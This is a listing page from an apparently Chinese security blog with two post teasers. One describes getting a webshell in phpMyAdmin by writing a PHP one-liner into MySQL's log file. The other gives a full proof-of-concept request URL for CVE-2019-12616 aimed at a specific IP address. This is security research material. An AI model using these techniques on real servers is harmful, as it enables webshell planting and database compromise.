前言: phpmyadmin后台拿webshell的方法主要分为两个方法: (1) 、通过日志文件拿webshell; (2) 、利用日志文件写入一句话;(这个方法可能在实际操作中会遇到困难); 本地搭建环境: Phpmystudy 2018 PHP--5.5.38 一、日志文件写入一句话来获取webshell: (1) 、首先我们先利用日志文件写入一句话来获取webshell,日志文件写入的思路利用mysql的一个日志文件。我们执行的每一个sql语句都会被保存到日志中,换个思路想一下把这个日志文件重名为*.php…

9月 5, 2019 0条评论 92点热度 0人点赞 qianxiao996 阅读全文

CVE-2019-12616 POC http://23.83.62.8:999//tbl_sql.php?sql_query=INSERT+INTO+'pma__bookmark'+('id'%2C+'dbase'%2C+'user'%2C+'label'%2C+'query')+VALUES+(DAYOFWEEK('')%2C+''%2C+''%2C+''%2C+'')&show_query=1&db=phpmyadmin&table=pma__bookmark

6月 19, 2019 0条评论 42点热度 0人点赞 qianxiao996 阅读全文